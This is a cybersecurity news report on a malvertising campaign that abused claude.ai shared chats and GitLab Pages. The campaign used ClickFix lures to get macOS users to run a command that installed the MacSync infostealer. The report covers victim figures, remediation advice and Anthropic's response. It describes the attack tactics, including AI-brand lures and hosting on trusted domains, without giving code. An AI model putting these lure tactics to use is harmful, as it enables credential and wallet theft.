Do Son 
At a Glance
| Platform abused | claude.ai shared chat feature (Anthropic) and GitLab Pages |
|---|---|
| Data exposed | Browser credentials, cookies, SSH keys, and crypto wallet files (stolen by MacSync) |
| Victims affected | Over 2,000 funneled; Asia-Pacific hit hardest (TrendAI figures) |
| Cause | Google Ads malvertising plus ClickFix social engineering |
| Disclosure status | Reported by TrendAI; Anthropic banned accounts and disabled chats |
| Source | Trend Micro (TrendAI Research) |
TL;DR
A ClickFix malvertising campaign abused claude.ai’s shared chat feature to deliver Mac malware. The attackers ran Google Ads for fake AI tools, then hosted lure pages on a trusted domain. The payload was the MacSync infostealer, which steals credentials and wallet files. The abuse ran for weeks before Anthropic shut it down.
What Was Exposed
Anthropic itself was not breached. Instead, the attackers abused a legitimate feature to host their lures. ClickFix tricks the victim into running the command by hand. The attacker never needs to bypass a download warning. The real harm fell on infected victims. On each infected Mac, the MacSync infostealer harvested browser credentials and cookies, SSH keys, and cryptocurrency wallet files. It then sent that data to a second-stage server. The stolen data can unlock accounts, code repositories, and crypto holdings.
How It Happened
The operators bought Google search ads for popular AI developer tools. Trend Micro found lures for Claude, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains. These ads funneled over 2,000 victims toward malicious pages. The operators tested many AI brands to find the best-performing lure. Claude products drew the most clicks by far. Early waves used fake download pages on GitLab Pages. The actor rotated 92 hostnames on the trusted *.gitlab.io domain. Trend Micro counted 106 malicious hostnames across six waves in seven weeks.
Then this ClickFix malvertising campaign made a sharp pivot. In May, the operators moved their lures onto claude.ai’s shared chat feature. They created weaponized “shared chats” that posed as Apple Support. Each chat told the user to open Terminal and paste a command. That command then pulled and ran the infostealer in the background. Trend Micro observed at least 45 weaponized share links in that single shift.
Why the Claude.ai Shared Chat Trick Worked
The pivot defeated old advice. Trend Micro notes that “every traditional defensive signal collapses” here. Victims landed on the real claude.ai domain with a valid certificate. As a result, browser warnings and URL checks saw nothing wrong. This makes the attack harder to spot than a fake lookalike site. The report adds that the move turned “the trusted domain into a delivery mechanism for credential-stealing malware.”
Who Is Affected
The campaign mainly hit macOS users who searched for AI tools. Asia-Pacific absorbed about 67% of confirmed traffic. Taiwan alone made up 30.5%, with 772 interactions. Japan and Singapore followed. Later waves broadened the targeting toward Singapore, India, France, and Italy. Notably, the loader skipped systems with a Russian keyboard layout. That choice points to a suspected Russian-speaking operator.
These figures come from TrendAI’s own traffic tracking. They are not the result of a third-party audit.
What Affected People Should Do
Anyone who pasted a terminal command from one of these pages should act now. Treat saved browser passwords, SSH keys, and wallet seeds as exposed. Reset those credentials from a clean device. Move any crypto funds to fresh wallets. Watch your accounts and crypto wallets for unusual activity over the coming weeks. Going forward, install apps only from official sites or package managers like brew. Also distrust software ads in search results.
Company Response
Anthropic acted after TrendAI reported the abuse. The company banned the accounts behind the scheme. It also disabled the malicious shared conversations. Anthropic says it is adding more abuse mitigations for the shared chat feature. The case shows that even trusted platforms need strong abuse controls.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
